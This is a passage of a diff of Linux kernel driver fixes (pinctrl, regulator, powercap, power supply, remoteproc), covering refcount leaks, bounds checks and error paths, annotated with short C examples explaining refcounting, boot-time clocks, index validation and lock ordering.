+index d76440ae10ff4..6aea512e5d4ee 100644
+--- a/drivers/phy/rockchip/phy-rockchip-typec.c
++++ b/drivers/phy/rockchip/phy-rockchip-typec.c
+@@ -821,10 +821,10 @@ static int tcphy_get_mode(struct rockchip_typec_phy *tcphy)
+ 	mode = MODE_DFP_USB;
+ 	id = EXTCON_USB_HOST;
+ 
+-	if (ufp) {
++	if (ufp > 0) {
+ 		mode = MODE_UFP_USB;
+ 		id = EXTCON_USB;
+-	} else if (dp) {
++	} else if (dp > 0) {
+ 		mode = MODE_DFP_DP;
+ 		id = EXTCON_DISP_DP;
+ 
+diff --git a/drivers/pinctrl/bcm/pinctrl-bcm2835.c b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+index 7857e612a1008..c7cdccdb4332a 100644
+--- a/drivers/pinctrl/bcm/pinctrl-bcm2835.c
++++ b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+@@ -363,8 +363,6 @@ static int bcm2835_of_gpio_ranges_fallback(struct gpio_chip *gc,
+ {
+ 	struct pinctrl_dev *pctldev = of_pinctrl_get(np);
+ 
+-	of_node_put(np);
+-
+ 	if (!pctldev)
+ 		return 0;
+ 
+diff --git a/drivers/pinctrl/mediatek/pinctrl-paris.c b/drivers/pinctrl/mediatek/pinctrl-paris.c
+index 74517e8109585..ad873bd051b68 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-paris.c
++++ b/drivers/pinctrl/mediatek/pinctrl-paris.c
+@@ -635,7 +635,7 @@ static int mtk_hw_get_value_wrap(struct mtk_pinctrl *hw, unsigned int gpio, int
+ ssize_t mtk_pctrl_show_one_pin(struct mtk_pinctrl *hw,
+ 	unsigned int gpio, char *buf, unsigned int buf_len)
+ {
+-	int pinmux, pullup, pullen, len = 0, r1 = -1, r0 = -1, rsel = -1;
++	int pinmux, pullup = 0, pullen = 0, len = 0, r1 = -1, r0 = -1, rsel = -1;
+ 	const struct mtk_pin_desc *desc;
+ 	u32 try_all_type = 0;
+ 
+@@ -712,7 +712,7 @@ static void mtk_pctrl_dbg_show(struct pinctrl_dev *pctldev, struct seq_file *s,
+ 			  unsigned int gpio)
+ {
+ 	struct mtk_pinctrl *hw = pinctrl_dev_get_drvdata(pctldev);
+-	char buf[PIN_DBG_BUF_SZ];
++	char buf[PIN_DBG_BUF_SZ] = { 0 };
+ 
+ 	(void)mtk_pctrl_show_one_pin(hw, gpio, buf, PIN_DBG_BUF_SZ);
+ 
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index 82b921fd630d5..7f193f2b1566a 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1120,8 +1120,8 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 
+ 		pin_desc[i].number = i;
+ 		/* Pin naming convention: P(bank_name)(bank_pin_number). */
+-		pin_desc[i].name = kasprintf(GFP_KERNEL, "P%c%d",
+-					     bank + 'A', line);
++		pin_desc[i].name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "P%c%d",
++						  bank + 'A', line);
+ 
+ 		group->name = group_names[i] = pin_desc[i].name;
+ 		group->pin = pin_desc[i].number;
+diff --git a/drivers/pinctrl/pinctrl-at91.c b/drivers/pinctrl/pinctrl-at91.c
+index 81dbffab621fb..ff3b6a8a0b170 100644
+--- a/drivers/pinctrl/pinctrl-at91.c
++++ b/drivers/pinctrl/pinctrl-at91.c
+@@ -1883,7 +1883,7 @@ static int at91_gpio_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	for (i = 0; i < chip->ngpio; i++)
+-		names[i] = kasprintf(GFP_KERNEL, "pio%c%d", alias_idx + 'A', i);
++		names[i] = devm_kasprintf(&pdev->dev, GFP_KERNEL, "pio%c%d", alias_idx + 'A', i);
+ 
+ 	chip->names = (const char *const *)names;
+ 
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index 5eeac92f610a0..0276b52f37168 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -3045,6 +3045,7 @@ static int rockchip_pinctrl_parse_groups(struct device_node *np,
+ 		np_config = of_find_node_by_phandle(be32_to_cpup(phandle));
+ 		ret = pinconf_generic_parse_dt_config(np_config, NULL,
+ 				&grp->data[j].configs, &grp->data[j].nconfigs);
++		of_node_put(np_config);
+ 		if (ret)
+ 			return ret;
+ 	}
+diff --git a/drivers/pinctrl/qcom/pinctrl-msm8976.c b/drivers/pinctrl/qcom/pinctrl-msm8976.c
+index ec43edf9b660a..e11d845847190 100644
+--- a/drivers/pinctrl/qcom/pinctrl-msm8976.c
++++ b/drivers/pinctrl/qcom/pinctrl-msm8976.c
+@@ -733,7 +733,7 @@ static const char * const codec_int2_groups[] = {
+ 	"gpio74",
+ };
+ static const char * const wcss_bt_groups[] = {
+-	"gpio39", "gpio47", "gpio88",
++	"gpio39", "gpio47", "gpio48",
+ };
+ static const char * const sdc3_groups[] = {
+ 	"gpio39", "gpio40", "gpio41",
+@@ -958,9 +958,9 @@ static const struct msm_pingroup msm8976_groups[] = {
+ 	PINGROUP(37, NA, NA, NA, qdss_tracedata_b, NA, NA, NA, NA, NA),
+ 	PINGROUP(38, NA, NA, NA, NA, NA, NA, NA, qdss_tracedata_b, NA),
+ 	PINGROUP(39, wcss_bt, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(40, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(41, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(42, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(40, wcss_wlan2, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(41, wcss_wlan1, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(42, wcss_wlan0, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+ 	PINGROUP(43, wcss_wlan, sdc3, NA, NA, qdss_tracedata_a, NA, NA, NA, NA),
+ 	PINGROUP(44, wcss_wlan, sdc3, NA, NA, NA, NA, NA, NA, NA),
+ 	PINGROUP(45, wcss_fm, NA, qdss_tracectl_a, NA, NA, NA, NA, NA, NA),
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzg2l.c b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+index a43824fd9505f..ca6303fc41f98 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzg2l.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+@@ -127,6 +127,7 @@ struct rzg2l_dedicated_configs {
+ struct rzg2l_pinctrl_data {
+ 	const char * const *port_pins;
+ 	const u32 *port_pin_configs;
++	unsigned int n_ports;
+ 	struct rzg2l_dedicated_configs *dedicated_pins;
+ 	unsigned int n_port_pins;
+ 	unsigned int n_dedicated_pins;
+@@ -1122,7 +1123,7 @@ static struct {
+ 	}
+ };
+ 
+-static int rzg2l_gpio_get_gpioint(unsigned int virq)
++static int rzg2l_gpio_get_gpioint(unsigned int virq, const struct rzg2l_pinctrl_data *data)
+ {
+ 	unsigned int gpioint;
+ 	unsigned int i;
+@@ -1131,13 +1132,13 @@ static int rzg2l_gpio_get_gpioint(unsigned int virq)
+ 	port = virq / 8;
+ 	bit = virq % 8;
+ 
+-	if (port >= ARRAY_SIZE(rzg2l_gpio_configs) ||
+-	    bit >= RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[port]))
++	if (port >= data->n_ports ||
++	    bit >= RZG2L_GPIO_PORT_GET_PINCNT(data->port_pin_configs[port]))
+ 		return -EINVAL;
+ 
+ 	gpioint = bit;
+ 	for (i = 0; i < port; i++)
+-		gpioint += RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[i]);
++		gpioint += RZG2L_GPIO_PORT_GET_PINCNT(data->port_pin_configs[i]);
+ 
+ 	return gpioint;
+ }
+@@ -1237,7 +1238,7 @@ static int rzg2l_gpio_child_to_parent_hwirq(struct gpio_chip *gc,
+ 	unsigned long flags;
+ 	int gpioint, irq;
+ 
+-	gpioint = rzg2l_gpio_get_gpioint(child);
++	gpioint = rzg2l_gpio_get_gpioint(child, pctrl->data);
+ 	if (gpioint < 0)
+ 		return gpioint;
+ 
+@@ -1311,8 +1312,8 @@ static void rzg2l_init_irq_valid_mask(struct gpio_chip *gc,
+ 		port = offset / 8;
+ 		bit = offset % 8;
+ 
+-		if (port >= ARRAY_SIZE(rzg2l_gpio_configs) ||
+-		    bit >= RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[port]))
++		if (port >= pctrl->data->n_ports ||
++		    bit >= RZG2L_GPIO_PORT_GET_PINCNT(pctrl->data->port_pin_configs[port]))
+ 			clear_bit(offset, valid_mask);
+ 	}
+ }
+@@ -1517,6 +1518,7 @@ static int rzg2l_pinctrl_probe(struct platform_device *pdev)
+ static struct rzg2l_pinctrl_data r9a07g043_data = {
+ 	.port_pins = rzg2l_gpio_names,
+ 	.port_pin_configs = r9a07g043_gpio_configs,
++	.n_ports = ARRAY_SIZE(r9a07g043_gpio_configs),
+ 	.dedicated_pins = rzg2l_dedicated_pins.common,
+ 	.n_port_pins = ARRAY_SIZE(r9a07g043_gpio_configs) * RZG2L_PINS_PER_PORT,
+ 	.n_dedicated_pins = ARRAY_SIZE(rzg2l_dedicated_pins.common),
+@@ -1525,6 +1527,7 @@ static struct rzg2l_pinctrl_data r9a07g043_data = {
+ static struct rzg2l_pinctrl_data r9a07g044_data = {
+ 	.port_pins = rzg2l_gpio_names,
+ 	.port_pin_configs = rzg2l_gpio_configs,
++	.n_ports = ARRAY_SIZE(rzg2l_gpio_configs),
+ 	.dedicated_pins = rzg2l_dedicated_pins.common,
+ 	.n_port_pins = ARRAY_SIZE(rzg2l_gpio_names),
+ 	.n_dedicated_pins = ARRAY_SIZE(rzg2l_dedicated_pins.common) +
+diff --git a/drivers/pinctrl/stm32/pinctrl-stm32.c b/drivers/pinctrl/stm32/pinctrl-stm32.c
+index e485506ea599c..e198233c10bad 100644
+--- a/drivers/pinctrl/stm32/pinctrl-stm32.c
++++ b/drivers/pinctrl/stm32/pinctrl-stm32.c
+@@ -1380,6 +1380,7 @@ static struct irq_domain *stm32_pctrl_get_irq_domain(struct platform_device *pde
+ 		return ERR_PTR(-ENXIO);
+ 
+ 	domain = irq_find_host(parent);
++	of_node_put(parent);
+ 	if (!domain)
+ 		/* domain not registered yet */
+ 		return ERR_PTR(-EPROBE_DEFER);
+diff --git a/drivers/platform/chrome/cros_ec_typec.c b/drivers/platform/chrome/cros_ec_typec.c
+index 59de4ce01faba..a74d01e9089e1 100644
+--- a/drivers/platform/chrome/cros_ec_typec.c
++++ b/drivers/platform/chrome/cros_ec_typec.c
+@@ -27,7 +27,7 @@
+ #define DRV_NAME "cros-ec-typec"
+ 
+ #define DP_PORT_VDO	(DP_CONF_SET_PIN_ASSIGN(BIT(DP_PIN_ASSIGN_C) | BIT(DP_PIN_ASSIGN_D)) | \
+-				DP_CAP_DFP_D)
++				DP_CAP_DFP_D | DP_CAP_RECEPTACLE)
+ 
+ /* Supported alt modes. */
+ enum {
+diff --git a/drivers/power/supply/power_supply_core.c b/drivers/power/supply/power_supply_core.c
+index 01d1ac79d982e..8382be867d274 100644
+--- a/drivers/power/supply/power_supply_core.c
++++ b/drivers/power/supply/power_supply_core.c
+@@ -1187,83 +1187,6 @@ static void psy_unregister_thermal(struct power_supply *psy)
+ 	thermal_zone_device_unregister(psy->tzd);
+ }
+ 
+-/* thermal cooling device callbacks */
+-static int ps_get_max_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long *state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	ret = power_supply_get_property(psy,
+-			POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT_MAX, &val);
+-	if (ret)
+-		return ret;
+-
+-	*state = val.intval;
+-
+-	return ret;
+-}
+-
+-static int ps_get_cur_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long *state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	ret = power_supply_get_property(psy,
+-			POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT, &val);
+-	if (ret)
+-		return ret;
+-
+-	*state = val.intval;
+-
+-	return ret;
+-}
+-
+-static int ps_set_cur_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	val.intval = state;
+-	ret = psy->desc->set_property(psy,
+-		POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT, &val);
+-
+-	return ret;
+-}
+-
+-static const struct thermal_cooling_device_ops psy_tcd_ops = {
+-	.get_max_state = ps_get_max_charge_cntl_limit,
+-	.get_cur_state = ps_get_cur_charge_cntl_limit,
+-	.set_cur_state = ps_set_cur_charge_cntl_limit,
+-};
+-
+-static int psy_register_cooler(struct power_supply *psy)
+-{
+-	/* Register for cooling device if psy can control charging */
+-	if (psy_has_property(psy->desc, POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT)) {
+-		psy->tcd = thermal_cooling_device_register(
+-			(char *)psy->desc->name,
+-			psy, &psy_tcd_ops);
+-		return PTR_ERR_OR_ZERO(psy->tcd);
+-	}
+-
+-	return 0;
+-}
+-
+-static void psy_unregister_cooler(struct power_supply *psy)
+-{
+-	if (IS_ERR_OR_NULL(psy->tcd))
+-		return;
+-	thermal_cooling_device_unregister(psy->tcd);
+-}
+ #else
+ static int psy_register_thermal(struct power_supply *psy)
+ {
+@@ -1273,15 +1196,6 @@ static int psy_register_thermal(struct power_supply *psy)
+ static void psy_unregister_thermal(struct power_supply *psy)
+ {
+ }
+-
+-static int psy_register_cooler(struct power_supply *psy)
+-{
+-	return 0;
+-}
+-
+-static void psy_unregister_cooler(struct power_supply *psy)
+-{
+-}
+ #endif
+ 
+ static struct power_supply *__must_check
+@@ -1355,10 +1269,6 @@ __power_supply_register(struct device *parent,
+ 	if (rc)
+ 		goto register_thermal_failed;
+ 
+-	rc = psy_register_cooler(psy);
+-	if (rc)
+-		goto register_cooler_failed;
+-
+ 	rc = power_supply_create_triggers(psy);
+ 	if (rc)
+ 		goto create_triggers_failed;
+@@ -1388,8 +1298,6 @@ __power_supply_register(struct device *parent,
+ add_hwmon_sysfs_failed:
+ 	power_supply_remove_triggers(psy);
+ create_triggers_failed:
+-	psy_unregister_cooler(psy);
+-register_cooler_failed:
+ 	psy_unregister_thermal(psy);
+ register_thermal_failed:
+ wakeup_init_failed:
+@@ -1541,7 +1449,6 @@ void power_supply_unregister(struct power_supply *psy)
+ 	sysfs_remove_link(&psy->dev.kobj, "powers");
+ 	power_supply_remove_hwmon_sysfs(psy);
+ 	power_supply_remove_triggers(psy);
+-	psy_unregister_cooler(psy);
+ 	psy_unregister_thermal(psy);
+ 	device_init_wakeup(&psy->dev, false);
+ 	device_unregister(&psy->dev);
+diff --git a/drivers/powercap/powercap_sys.c b/drivers/powercap/powercap_sys.c
+index f0654a932b372..ff736b006198f 100644
+--- a/drivers/powercap/powercap_sys.c
++++ b/drivers/powercap/powercap_sys.c
+@@ -529,9 +529,6 @@ struct powercap_zone *powercap_register_zone(
+ 	power_zone->name = kstrdup(name, GFP_KERNEL);
+ 	if (!power_zone->name)
+ 		goto err_name_alloc;
+-	dev_set_name(&power_zone->dev, "%s:%x",
+-					dev_name(power_zone->dev.parent),
+-					power_zone->id);
+ 	power_zone->constraints = kcalloc(nr_constraints,
+ 					  sizeof(*power_zone->constraints),
+ 					  GFP_KERNEL);
+@@ -554,9 +551,16 @@ struct powercap_zone *powercap_register_zone(
+ 	power_zone->dev_attr_groups[0] = &power_zone->dev_zone_attr_group;
+ 	power_zone->dev_attr_groups[1] = NULL;
+ 	power_zone->dev.groups = power_zone->dev_attr_groups;
++	dev_set_name(&power_zone->dev, "%s:%x",
++					dev_name(power_zone->dev.parent),
++					power_zone->id);
+ 	result = device_register(&power_zone->dev);
+-	if (result)
+-		goto err_dev_ret;
++	if (result) {
++		put_device(&power_zone->dev);
++		mutex_unlock(&control_type->lock);
++
++		return ERR_PTR(result);
++	}
+ 
+ 	control_type->nr_zones++;
+ 	mutex_unlock(&control_type->lock);
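The powercap fix follows the driver-core rule that once device_register() has been called, the struct device is refcounted and must be dropped via put_device() (which runs the release callback) rather than freed or leaked on the error path. A minimal refcount model of why a bare free() would be wrong (plain C; register_object() stands in for device_register()):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct object {
    int refcount;
    void (*release)(struct object *);
    char *name;
};

static void get_object(struct object *obj)
{
    obj->refcount++;
}

static void put_object(struct object *obj)
{
    if (--obj->refcount == 0)
        obj->release(obj);    /* last reference: run the release hook */
}

static void object_release(struct object *obj)
{
    printf("releasing %s\n", obj->name);
    free(obj->name);
    free(obj);
}

/* Registration takes its own reference; on failure it drops only
 * that one, and the caller still owns the initial reference. */
static int register_object(struct object *obj, int simulate_failure)
{
    get_object(obj);
    if (simulate_failure) {
        put_object(obj);
        return -1;
    }
    return 0;
}

int main(void)
{
    struct object *obj = calloc(1, sizeof(*obj));

    obj->refcount = 1;
    obj->release = object_release;
    obj->name = strdup("zone0");

    if (register_object(obj, 1))
        put_object(obj);    /* correct: runs object_release() once.
                             * A bare free(obj) here would leak
                             * obj->name and skip the release hook. */
    return 0;
}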
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index 3716ba060368c..cdac193634e07 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -1584,7 +1584,7 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 	}
+ 
+ 	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get();
++		rdev->last_off = ktime_get_boottime();
+ 
+ 	/* If the constraints say the regulator should be on at this point
+ 	 * and we have control then make sure it is enabled.
+@@ -2673,7 +2673,7 @@ static int _regulator_do_enable(struct regulator_dev *rdev)
+ 		 * this regulator was disabled.
+ 		 */
+ 		ktime_t end = ktime_add_us(rdev->last_off, rdev->desc->off_on_delay);
+-		s64 remaining = ktime_us_delta(end, ktime_get());
++		s64 remaining = ktime_us_delta(end, ktime_get_boottime());
+ 
+ 		if (remaining > 0)
+ 			_regulator_delay_helper(remaining);
+@@ -2912,7 +2912,7 @@ static int _regulator_do_disable(struct regulator_dev *rdev)
+ 	}
+ 
+ 	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get();
++		rdev->last_off = ktime_get_boottime();
+ 
+ 	trace_regulator_disable_complete(rdev_get_name(rdev));
+ 
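The regulator/core.c hunks time off_on_delay against ktime_get_boottime() instead of ktime_get(): CLOCK_MONOTONIC stops while the system is suspended, so a regulator switched off just before suspend would otherwise be re-delayed at resume even though the hardware ramp time had long since passed in wall-clock terms. The difference between the two clocks is observable from userspace (Linux-specific clock IDs):

#include <stdio.h>
#include <time.h>

static long long ns(struct timespec t)
{
    return t.tv_sec * 1000000000LL + t.tv_nsec;
}

int main(void)
{
    struct timespec mono, boot;

    clock_gettime(CLOCK_MONOTONIC, &mono);
    clock_gettime(CLOCK_BOOTTIME, &boot);

    /* The gap is the total time the machine has spent suspended.
     * Timing a hardware ramp delay against CLOCK_MONOTONIC would
     * silently stretch across a suspend/resume cycle. */
    printf("monotonic: %lld ns\n", ns(mono));
    printf("boottime:  %lld ns\n", ns(boot));
    printf("suspended: %lld ns\n", ns(boot) - ns(mono));
    return 0;
}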
+diff --git a/drivers/regulator/max77802-regulator.c b/drivers/regulator/max77802-regulator.c
+index 21e0eb0f43f94..befe5f319819b 100644
+--- a/drivers/regulator/max77802-regulator.c
++++ b/drivers/regulator/max77802-regulator.c
+@@ -94,9 +94,11 @@ static int max77802_set_suspend_disable(struct regulator_dev *rdev)
+ {
+ 	unsigned int val = MAX77802_OFF_PWRREQ;
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	max77802->opmode[id] = val;
+ 	return regmap_update_bits(rdev->regmap, rdev->desc->enable_reg,
+ 				  rdev->desc->enable_mask, val << shift);
+@@ -110,7 +112,7 @@ static int max77802_set_suspend_disable(struct regulator_dev *rdev)
+ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	unsigned int val;
+ 	int shift = max77802_get_opmode_shift(id);
+ 
+@@ -127,6 +129,9 @@ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ 		return -EINVAL;
+ 	}
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
++
+ 	max77802->opmode[id] = val;
+ 	return regmap_update_bits(rdev->regmap, rdev->desc->enable_reg,
+ 				  rdev->desc->enable_mask, val << shift);
+@@ -135,8 +140,10 @@ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ static unsigned max77802_get_mode(struct regulator_dev *rdev)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	return max77802_map_mode(max77802->opmode[id]);
+ }
+ 
+@@ -160,10 +167,13 @@ static int max77802_set_suspend_mode(struct regulator_dev *rdev,
+ 				     unsigned int mode)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	unsigned int val;
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
++
+ 	/*
+ 	 * If the regulator has been disabled for suspend
+ 	 * then is invalid to try setting a suspend mode.
+@@ -209,9 +219,11 @@ static int max77802_set_suspend_mode(struct regulator_dev *rdev,
+ static int max77802_enable(struct regulator_dev *rdev)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	if (max77802->opmode[id] == MAX77802_OFF_PWRREQ)
+ 		max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
+ 
+@@ -495,7 +507,7 @@ static int max77802_pmic_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < MAX77802_REG_MAX; i++) {
+ 		struct regulator_dev *rdev;
+-		int id = regulators[i].id;
++		unsigned int id = regulators[i].id;
+ 		int shift = max77802_get_opmode_shift(id);
+ 		int ret;
+ 
+@@ -513,10 +525,12 @@ static int max77802_pmic_probe(struct platform_device *pdev)
+ 		 * the hardware reports OFF as the regulator operating mode.
+ 		 * Default to operating mode NORMAL in that case.
+ 		 */
+-		if (val == MAX77802_STATUS_OFF)
+-			max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
+-		else
+-			max77802->opmode[id] = val;
++		if (id < ARRAY_SIZE(max77802->opmode)) {
++			if (val == MAX77802_STATUS_OFF)
++				max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
++			else
++				max77802->opmode[id] = val;
++		}
+ 
+ 		rdev = devm_regulator_register(&pdev->dev,
+ 					       &regulators[i], &config);
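All of the max77802 hunks apply one pattern: the regulator id comes from table data, so the opmode[] index derived from it is validated with WARN_ON_ONCE() before use instead of being trusted. Distilled to plain C (ARRAY_SIZE is the usual sizeof ratio macro; the names are illustrative):

#include <errno.h>
#include <stdio.h>

#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))

static unsigned char opmode[10];

static int set_opmode(unsigned int id, unsigned char val)
{
    /* id is unsigned, so a single comparison also rejects what
     * a signed caller would have passed as -1. */
    if (id >= ARRAY_SIZE(opmode)) {
        fprintf(stderr, "bogus regulator id %u\n", id);
        return -EINVAL;
    }
    opmode[id] = val;
    return 0;
}

int main(void)
{
    printf("%d\n", set_opmode(3, 1));                  /* 0 */
    printf("%d\n", set_opmode((unsigned int)-1, 1));   /* -22, no OOB write */
    return 0;
}

Switching the local id variables from int to unsigned int in the patch is what makes the single >= check sufficient.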
+diff --git a/drivers/regulator/s5m8767.c b/drivers/regulator/s5m8767.c
+index 35269f9982105..754c6fcc6e642 100644
+--- a/drivers/regulator/s5m8767.c
++++ b/drivers/regulator/s5m8767.c
+@@ -923,10 +923,14 @@ static int s5m8767_pmic_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < pdata->num_regulators; i++) {
+ 		const struct sec_voltage_desc *desc;
+-		int id = pdata->regulators[i].id;
++		unsigned int id = pdata->regulators[i].id;
+ 		int enable_reg, enable_val;
+ 		struct regulator_dev *rdev;
+ 
++		BUILD_BUG_ON(ARRAY_SIZE(regulators) != ARRAY_SIZE(reg_voltage_map));
++		if (WARN_ON_ONCE(id >= ARRAY_SIZE(regulators)))
++			continue;
++
+ 		desc = reg_voltage_map[id];
+ 		if (desc) {
+ 			regulators[id].n_voltages =
+diff --git a/drivers/regulator/tps65219-regulator.c b/drivers/regulator/tps65219-regulator.c
+index c484c943e4675..58f6541b6417b 100644
+--- a/drivers/regulator/tps65219-regulator.c
++++ b/drivers/regulator/tps65219-regulator.c
+@@ -173,24 +173,6 @@ static unsigned int tps65219_get_mode(struct regulator_dev *dev)
+ 		return REGULATOR_MODE_NORMAL;
+ }
+ 
+-/*
+- * generic regulator_set_bypass_regmap does not fully match requirements
+- * TPS65219 Requires explicitly that regulator is disabled before switch
+- */
+-static int tps65219_set_bypass(struct regulator_dev *dev, bool enable)
+-{
+-	struct tps65219 *tps = rdev_get_drvdata(dev);
+-	unsigned int rid = rdev_get_id(dev);
+-
+-	if (dev->desc->ops->is_enabled(dev)) {
+-		dev_err(tps->dev,
+-			"%s LDO%d enabled, must be shut down to set bypass ",
+-			__func__, rid);
+-		return -EBUSY;
+-	}
+-	return regulator_set_bypass_regmap(dev, enable);
+-}
+-
+ /* Operations permitted on BUCK1/2/3 */
+ static const struct regulator_ops tps65219_bucks_ops = {
+ 	.is_enabled		= regulator_is_enabled_regmap,
+@@ -217,7 +199,7 @@ static const struct regulator_ops tps65219_ldos_1_2_ops = {
+ 	.set_voltage_sel	= regulator_set_voltage_sel_regmap,
+ 	.list_voltage		= regulator_list_voltage_linear_range,
+ 	.map_voltage		= regulator_map_voltage_linear_range,
+-	.set_bypass		= tps65219_set_bypass,
++	.set_bypass		= regulator_set_bypass_regmap,
+ 	.get_bypass		= regulator_get_bypass_regmap,
+ };
+ 
+@@ -367,7 +349,7 @@ static int tps65219_regulator_probe(struct platform_device *pdev)
+ 		irq_data[i].type = irq_type;
+ 
+ 		tps65219_get_rdev_by_name(irq_type->regulator_name, rdevtbl, rdev);
+-		if (rdev < 0) {
++		if (IS_ERR(rdev)) {
+ 			dev_err(tps->dev, "Failed to get rdev for %s\n",
+ 				irq_type->regulator_name);
+ 			return -EINVAL;
+diff --git a/drivers/remoteproc/mtk_scp_ipi.c b/drivers/remoteproc/mtk_scp_ipi.c
+index 00f041ebcde63..4c0d121c2f54d 100644
+--- a/drivers/remoteproc/mtk_scp_ipi.c
++++ b/drivers/remoteproc/mtk_scp_ipi.c
+@@ -164,21 +164,21 @@ int scp_ipi_send(struct mtk_scp *scp, u32 id, void *buf, unsigned int len,
+ 	    WARN_ON(len > sizeof(send_obj->share_buf)) || WARN_ON(!buf))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&scp->send_lock);
+-
+ 	ret = clk_prepare_enable(scp->clk);
+ 	if (ret) {
+ 		dev_err(scp->dev, "failed to enable clock\n");
+-		goto unlock_mutex;
++		return ret;
+ 	}
+ 
++	mutex_lock(&scp->send_lock);
++
+ 	 /* Wait until SCP receives the last command */
+ 	timeout = jiffies + msecs_to_jiffies(2000);
+ 	do {
+ 		if (time_after(jiffies, timeout)) {
+ 			dev_err(scp->dev, "%s: IPI timeout!\n", __func__);
+ 			ret = -ETIMEDOUT;
+-			goto clock_disable;
++			goto unlock_mutex;
+ 		}
+ 	} while (readl(scp->reg_base + scp->data->host_to_scp_reg));
+ 
+@@ -205,10 +205,9 @@ int scp_ipi_send(struct mtk_scp *scp, u32 id, void *buf, unsigned int len,
+ 			ret = 0;
+ 	}
+ 
+-clock_disable:
+-	clk_disable_unprepare(scp->clk);
+ unlock_mutex:
+ 	mutex_unlock(&scp->send_lock);
++	clk_disable_unprepare(scp->clk);
+ 
+ 	return ret;
+ }
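The scp_ipi_send() reordering is about lock scope: the clock is enabled before send_lock is taken and disabled only after it is dropped, so the mutex guards just the shared mailbox state and an early clock failure never touches the lock at all. The shape of that pattern, with pthreads standing in for the kernel mutex and prepare()/finish() for the clock calls:

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static int shared_state;

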